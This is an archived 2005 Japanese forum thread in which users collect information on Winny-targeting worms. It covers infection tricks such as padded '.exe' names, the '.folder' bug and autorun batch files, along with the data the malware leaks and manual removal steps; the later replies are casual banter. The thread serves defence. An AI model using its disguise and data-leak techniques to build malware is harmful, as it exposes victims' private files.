5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Winnyを狙ったワーム・ニュイルス情報 Part48

1 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:19:34 ID:b1UXhBOC0
『山田はニュイルスではありません』『個別スレがあるならそちらへ』
Winnyで流れている"新種の"ワーム、ウイルス等を報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行させる

■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。

wiki&テンプレテキスト
ttp://pwiki.chbox.com/pukiwiki.php?Winny%A4%F2%C1%C0%A4%C3%A4%BF%A1%C1
ttp://z.la/peziq

前スレ
Winnyを狙ったワーム・ニュイルス情報 Part47
http://tmp5.2ch.net/test/read.cgi/download/1134743735/

2 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:19:50 ID:b1UXhBOC0
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【使用AntiVirusソフト】
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンしたなら結果】
【Winnyのバージョン】
【Winny歴、総DL量】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状、具体的に分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】

3 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:19:58 ID:b1UXhBOC0
■推奨無視リスト
このままIgnore.txtにコピペしてください。
.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。

4 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:16 ID:b1UXhBOC0
■感染しないための注意1 〜予めやっておくべき設定〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリック。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく。(詳しくは別記)
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 また怪しいと思ったらwhiterVBS簡易チェッカーで調べてみる。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
 にあるFlagsの値を10進数で1に変更する。
・アイコン偽装したexeを見分けるため、フォルダ・txt・aviなど偽装されやすい拡張子は標準アイコンから変更しておく。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。

5 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:20 ID:b1UXhBOC0
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど、解凍前に中身を確認できるアーカイバを使う。
・CDイメージはAutorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・exeファイルの実行は完全自己責任、転んでも泣かない。
・ソフトを使って予め解凍する前に怪しい拡張子ファイルを削除する。
 ttp://a-t-software.hp.infoseek.co.jp/apps/delexe/index.html
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://winny.serveftp.com/nydb/top.php

6 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:27 ID:b1UXhBOC0
※CD/DVDドライブのAutorunの切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行]で「regedit」と入力
  2.レジストリエディタで、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※窓の手などの管理ソフトでも簡単にオフに出来ます。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。

7 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:38 ID:b1UXhBOC0
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■主な症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp"に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\???\???.exe(???は任意の名前)が登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
■主な活動内容
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\???\???.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」

■まとめサイト
 ttp://myui.s53.xrea.com/kin/index.html
■挙動の似たウイルス【苺きんたま(Trojan.Upchan)】
 ttp://www.geocities.jp/ichigo_kintama/

8 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:47 ID:b1UXhBOC0
★流行種その2
【Antinny.ms(仮称)】
Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■主な症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 ※Systemフォルダにあるsvchost.exeは問題ありません。
・UpFolder.txtにBBSという名前でダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の常駐を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子を消しても、再起動すると親が子を再度作成する。
 親はms???.exe(282k)、子はms???.exe(248k)。
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■駆除方法
1.親のファイル名が含まれるレジストリキーを削除。
 Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
 (Win9x、MEの場合は不明)
2.セーフモードで再起動し、ファイルを親子ともども削除。
3.HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
 HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4.NyのUpフォルダ設定を元に戻す。
5.ノートンやバスター等のワクチンソフトを再インストール。
 バスターはPCCTool.exeを使えば再インストールせずに済む。

9 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:20:57 ID:b1UXhBOC0
★流行種その3
【Autorun+batを利用したウイルス】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■主な活動内容(種類により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動する毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動する毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)の起動をatコマンドでスケジュールする。
・壁紙をエロCGに変更(画面のプロパティでの修正は不可)。
■駆除方法(種類により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。


10 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:21:09 ID:b1UXhBOC0
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
■感染ルート
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染する模様。
■主な症状(感染確認方法)
・ny起動すると画面が真っ黒になり、
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャが起動できない。
■主な活動内容
・C:\WINNT\Web\Wallpaperのフォルダを開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」を追加。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe"(22,528バイト)ができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルをいくつか(3つ?)作る。
 ファイル名はシステムに使用されるものをランダムに使用する模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下の値も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■駆除方法
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexeを削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで追加されたキーを削除。


11 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:21:21 ID:b1UXhBOC0
★流行種その5
【仙台キンタマ(W32.SillyP2P)】
■感染ルート
・主にエロゲのイメージファイルをマウント、Autorunでウイルス発動。
■主な活動内容
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exeを追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
 Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
 downフォルダ内のファイル一覧のtxt、デスクトップSS、
 Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。

【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・ハードディスク内の.doc、.xls、.txt、.jpgなどを収集しnyへ放流する。
・ノートンはAntinny.Gとして緊急対策。


12 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:21:30 ID:b1UXhBOC0
★流行種その6
【仁義なきキンタマ】
■感染ルート
・フォルダアイコンに偽装したサイズ829,440の「新しいフォルダ      .exe」を踏んで感染。
・感染者が流す、[仁義なきキンタマ] ○○のドキュメント.zipに偽装したウイルス本体が同梱されている。
・セキュリティレベルが低いと同梱されているhtmlから感染。
■主な症状(感染確認方法)
・C:\WINDOWS\system32\drivers\svchost.exe
 C:\WINDOWS\system32\wbem\     .exeを作成。
・C:\Documents and Settings\ユーザー名\Local Settings\Temp\jktemp\upにupフォルダ作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にsvchost.exeが登録される。
■主な活動内容
・デスクトップのスクリーンショットを取る。
・Winnyの検索履歴・tab1.txt・tab2.txt、WinMX共有ファイル名、2chブラウザのkakikomi.txt、IEのcookie、
 OEの受信・送信フォルダ、hotmail情報、ワード・エクセルのファイルをupフォルダに圧縮する。
・UpFolder.txtを書き換えて以下の形でwiinyにファイルを勝手にアップロードする。
 [仁義なきキンタマ] ○○のデスクトップ(******-****).jpg
 [仁義なきキンタマ] ○○のドキュメント.zip
■駆除方法
・C:\WINDOWS\system32\drivers\svchost.exe
 C:\WINDOWS\system32\wbem\     .exeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにある
 system32\drivers\svchost.exeを削除。
・UpFolder.txtの修正、作成されたupフォルダの削除。
■予防
・exe踏むなかれ。

まとめサイト
ttp://kintama.client.jp/
ttp://nemoba.seesaa.net/article/2479117.html


13 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:21:38 ID:b1UXhBOC0
★流行種その7
【欄検眼段】
■感染ルート
・アプリに混入させ感染させる。
■主な症状(感染確認方法)
・C:\WINDOWS\system32\IMJPMlG.exeを作成。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にIMJPMlG.exeが登録される。
・フォルダ「temp000」を作成。
・UpFolder.txtを作成し以下の内容を書き込み、アップロードさせる。
   [temp000]
   Path=C:\temp000
   Trip=12345
■主な活動内容
・OS起動時にデジカメ画像ファイル「DSC〜.JPG」を探し、「.GJB」に拡張子変更させアップロードする。
■駆除方法
・C:\WINDOWS\system32\IMJPMlG.exeを削除。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 にIMJPMlG.exeを削除する。
・フォルダ「temp000」削除、UpFolder.txt修正。


14 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:21:50 ID:b1UXhBOC0
★流行種その8
【山田ウイルス&亜種】
■感染ルート
・アップローダーやファイル共有ソフトの圧縮ファイルにある偽装exeを踏む。
■主な症状(感染確認方法)
http://127.0.0.1/ をクリック。
 感染しているとHTTPサーバが立ち上がっているためハードディスクのフィルリスト一覧が表示される。
・C:\Program Files\(ランダム)\mellpon\svchost.exeに作成されている。(ウィルス本体)
・HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runに
 C:\Program Files\(ランダム)\mellpon\svchost.exeが登録される。
・C:\WINDOWS\system32\drivers\etc\hostsにいろいろ追記されている。
・C:\boot.iniに追記されている。
■主な活動内容
・ウィルスを実行した場所にmellponフォルダが作成される。
・mellponフォルダにデスクトップのスクリーンショットを~ss.jpgとして保存。
・ハードディスクに保存されてるファイルのリストをドライブ名.htmlとして保存。
・感染者のPCにHTTPサーバを立ち上げて、ハードディスクの中身を世界に公開する。
・2ちゃんねるへランダムに書き込みを定期的に行う。
・hostsファイルを書き換えることにより、不都合を起こさせる。
■駆除方法
・HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runの
 ウイルス本体を削除する。
・C:\WINDOWS\system32\drivers\etc\hostsに
 「#」で始まる行と「127.0.0.1 localhost」という行以外のものがあったら
 それらを全て削除して上書き保存する。
■予防
・exe踏むなかれ。

まとめサイト
ttp://nemoba.seesaa.net/article/2891535.html
ttp://www2.atwiki.jp/kawaisosu/

15 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:22:03 ID:b1UXhBOC0
★流行種その9
【クズを1000匹道連れだ】
■感染ルート
・牝奴隷〜犯された放課後〜 NoDVDパッチ
・はぴねす NoDVD-モザイク消去パッチ
■主な症状(感染確認方法)
・「これを貴方が見る頃 私はもう この世のものではないでしょうね」というタイトルのウィンドウで、
 「もはや死ぬしかないようだ だけどタダでは死にません クズを1000匹道連れだ
 喜べお前は ***匹目」というメッセージが表示される。さらに、「kimmo.scr」というファイルを生成し、
 スクリーンセーバーを変更。変更されたスクリーンセーバーには田中康夫長野県知事と見られる
 人物が映し出される。
■主な活動内容
・エロゲのモザイクは消えませんでした。
■駆除方法
・パソコンごと2階の窓から投げ捨てろ。
■予防
・exe踏むなかれ。


16 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:22:15 ID:b1UXhBOC0
過去スレ
Part1 ttp://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 ttp://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 ttp://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 ttp://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 ttp://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 ttp://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 ttp://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 ttp://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 ttp://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 ttp://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 ttp://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 ttp://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 ttp://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 ttp://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 ttp://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 ttp://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 ttp://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 ttp://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 ttp://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 ttp://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 ttp://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 ttp://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 ttp://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 ttp://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 ttp://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 ttp://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 ttp://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 ttp://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 ttp://tmp4.2ch.net/test/read.cgi/download/1099709559/

17 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:22:31 ID:b1UXhBOC0
Part31 ttp://tmp4.2ch.net/test/read.cgi/download/1100072614/
Part32 ttp://tmp4.2ch.net/test/read.cgi/download/1102892779/
Part33 ttp://tmp4.2ch.net/test/read.cgi/download/1107015489/
Part34 ttp://tmp4.2ch.net/test/read.cgi/download/1108905276/
Part35 ttp://tmp4.2ch.net/test/read.cgi/download/1110795819/
Part35 ttp://tmp4.2ch.net/test/read.cgi/download/1113203081/
Part37 ttp://tmp4.2ch.net/test/read.cgi/download/1113203081/
Part38 ttp://tmp5.2ch.net/test/read.cgi/download/1113652734/
Part39 ttp://tmp5.2ch.net/test/read.cgi/download/1115476484/
Part40 ttp://tmp5.2ch.net/test/read.cgi/download/1118423391/
Part41 ttp://tmp5.2ch.net/test/read.cgi/download/1120738522/
Part42 ttp://tmp5.2ch.net/test/read.cgi/download/1123171787/
Part43 ttp://tmp5.2ch.net/test/read.cgi/download/1125838300/
Part44 ttp://tmp5.2ch.net/test/read.cgi/download/1128060292/
Part45 ttp://tmp5.2ch.net/test/read.cgi/download/1130044998/
Part46 ttp://tmp5.2ch.net/test/read.cgi/download/1132044109/
Part47 ttp://tmp5.2ch.net/test/read.cgi/download/1134743735/

18 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:26:09 ID:VRVNasoF0
SUSIEいれちゃってWindows Picture and Fax Viewer消滅したんだが
復活するにはどうしたら良いの???


19 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:31:01 ID:VWP8fQQv0
>>1
非常に乙。

20 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:35:33 ID:x4RVNNdv0
いち乙

21 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:36:30 ID:catQ5Qhl0
>>15
http://tmp5.2ch.net/test/read.cgi/download/1134743735/221

★流行種その9
【クズを1000匹道連れだ】
■感染ルート
・牝奴隷〜犯された放課後〜 NoDVDパッチ
・はぴねす NoDVD-モザイク消去パッチ
■主な症状(感染確認方法)
・「これを貴方が見る頃 私はもう この世のものではないでしょうね」というタイトルのウィンドウで、
 「もはや死ぬしかないようだ だけどタダでは死にません クズを1000匹道連れだ
 喜べお前は ***匹目」というメッセージが表示される。さらに、「kimmo.scr」というファイルを生成し、
 スクリーンセーバーを変更。変更されたスクリーンセーバーには田中康夫長野県知事と見られる
 人物が映し出される。
■主な活動内容
・エロゲのモザイクは消えませんでした。
■駆除方法
・HKEY_LOCAL_MACHINE→SOFTWARE→Microsoft→Windows NT →CurrentVersion→Winlogon

LegalNoticeText
LegalNoticeCaption を削除でPC起動時のメッセージ削除
・msconfigはWindowsの検索で探すと上書きされてないのが出てくるからそれを他方にコピー
・システムの復元は知らん

■予防
・exe踏むなかれ。

22 :[名無し]さん(bin+cue).rar:2005/12/31(土) 00:38:24 ID:2+BIlk0D0
>>21
テンプレ変更乙

23 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:15:32 ID:k+6bnCtd0
546 名前:名無しさん@6周年 投稿日:2005/12/31(土) 00:53:24 ID:mbTRhNI/0
どうやら>>88にあるもの自身にメモ帳や電卓起動する以外に
仕掛けがあるみたいだな。

563 名前:名無しさん@6周年 投稿日:2005/12/31(土) 01:08:28 ID:mbTRhNI/0
>>556
デバッガでトレースしてたら、プロセス起動でfaleしまくってるから、
DDoSか何かゾンビプロセス探しまくってる感じ。


マジデ?

24 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:15:43 ID:n7GbCe0Q0
>>前スレ994
実は俺も一度だけインストール中の再起動で青画面見たことあるよ。
でもそれ以降はなぜか見たことない。
何が原因だったのか未だにわからないよ。

25 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:16:36 ID:YDprSrhx0
avastで両方反応するけど電卓もメモ帳も起動するのってマズい?

26 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:16:52 ID:SiRKG+zL0
1000 :[名無し]さん(bin+cue).rar[]: 2005/12/31(土) 01:14:58 ID:rAXaqU4T0
1000ならキンタマを実行させるニュイルスが登場する


(((゚Д゚;)))

27 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:16:55 ID:MtTC9AEt0
>>25


28 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:17:25 ID:n7GbCe0Q0
念のためMeでもDLLをリネームしておくか。

>>25
反応するだけで止めてくれないの?

29 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:19:18 ID:pIVoqrEL0
>>24 まぁMeは負け組だよ

30 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:20:29 ID:0dwJeeSK0
>>23
ガセ


31 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:21:18 ID:n7GbCe0Q0
>>29
いいんだよ、好きでMe使ってるんだから。負け組も勝ち組も関係ないさ。
m9( ^ω^ )2k/XP使いの人達はこの恐怖を味わいながら年を越してくれたまへ。

⊂二二二( ^ω^)二⊃じゃあ巣に帰るお。

32 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:22:29 ID:fn1DM71Y0
ああ

33 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:24:09 ID:kydeX0LA0
>>32
氏ね!

34 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:24:51 ID:ljoHrzUm0
>>32
http://kjm.kir.jp/pc/img/11128.jpg

35 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:25:00 ID:dZxpcEbx0
もせのアルバムジャケJPGとかで流行りそうだな

36 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:27:31 ID:6UzhwLQY0
                      〃⌒ヽ、
                     //     ヽ
                 ,  ---- 、 | |       |l
             /       `ト、     |!
              /  , -,       ヽ
           / / 〈 / ─ィ//|    ヽ
            /∠//7 ー‐'´〃/  〃ト i
          l/| ⌒ト、 C`ー-、 `ー' リi  |
         〈入_{|⊂⊃     ヽ、/\|
           L广ト | l /⌒ヽ、_ ⊂⊃l ̄   
         r' /{ lノ八r「ヽnノ_, イl| |    で、私には関係ないんですかぁ?
         } /  〉 厂⊆  ├r ∧/
        ∧|    }L.ニ|L8 、 \! /  〉
       「`ヽト   〈∠ / ̄ \ \__」
      └r┴|` ┬个-------へ __ノ〉
      ト┘ / /7/ `ー-----一へ-┴、
      フー/__/ケ          \-ト、
     /  ノ  /              ∧ `ー、
    / /  イ_                〉 })  }
   \ {   (V\人  i  i       _入/ 〃-- '′
     ``ー‐'" ヽ、二宀¬====二--‐'´

37 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:27:34 ID:YNcZGBjb0
- Vps: 更新されました
(前のバージョン: 0552-3, 更新後のバージョン: 0552-4)

avast!早いな

38 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:28:30 ID:o3Jdb4Xv0
      _   (⌒Y´ ̄ヽ  ∧_/( ̄)) ∧_∧
    γ´  `ヽ_`と.__   )( ・ ∩( 《 ( ・∀・)  ゴロン
     )) ,、 , ) <、_,.ノ  ヽ、.__,ノ  l  つ つ
    ((_/し∪V              .ヽ.__ノ!__)) ゴロン
  ∧__∧       ∧_∧          ∧_∧
 (    )       ( ;´Д`)        (・∀・ ) もう帰さないぞ〜。
 (    つ     (U_U )つ       (つ  と)
 .ヽ___ノj       >>31         (⌒Y⌒)
    ∧__∧                . / ̄ヽ ̄
   (・    )           __    ( __  ) (  ゴロン
    と   ヽ ( ̄))∧_∧  /´ `Y⌒) VUVJ_)
    (__ト、__丿 〉 》∩ _) (   .__つ´
          ヽ、.__,ノ   ヽ、__,.>

39 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:34:46 ID:DmZBxPnX0
C69の地引網どころじゃないので大人しく引きこもることにしますた

40 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:37:56 ID:q3SB95Zq0
>>34
トラブルが多いアンチウイルス製品などに頼り切るよりも、
ウェブ閲覧にはFirefoxのようなブラウザをなるべく用いて、
怪しげなものは開かないようにするという【基本】を重視すべし。
どうしてもIE系を使うなら、セキュリティ設定を【高】に。

>NOD32 主なトラブル履歴
>
>2005年9月ブルースクリーンが生じてWindowsが停止する問題が再発。リリース中止。
>http://canon-sol.jp/product/nd/nd_update.html
>レジストリが破壊されてWindowsシャットダウン時にブルースクリーンとなる問題
>登録済みのアプリケーションが強制削除される問題
>http://canon-sol.jp/product/nd/v20008.html
>通信不能となって最悪の場合はOSがリブートの繰り返しになる問題
>http://canon-sol.jp/supp/nd/wndt4210.html
>スキャンすると受信メールの全部が削除される問題
>http://canon-sol.jp/supp/nd/wndt7003.html
>プリンタとの相性で印刷不能になる問題。
>http://canon-sol.jp/supp/nd/wndt4205.html
>Windowsアップデートができなくなる問題
>http://canon-sol.jp/supp/nd/wndt4212.html

41 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:38:17 ID:VRVNasoF0
avastスキャンおそwwwww
動画の検索なんていらないのに、無駄に長い

42 :25:2005/12/31(土) 01:39:53 ID:YDprSrhx0
うん。
反応するけど止めてくれないんだ
ヤバいかな。。。

43 :[名無し]さん(bin+cue).rar:2005/12/31(土) 01:49:59 ID:aHU31A750
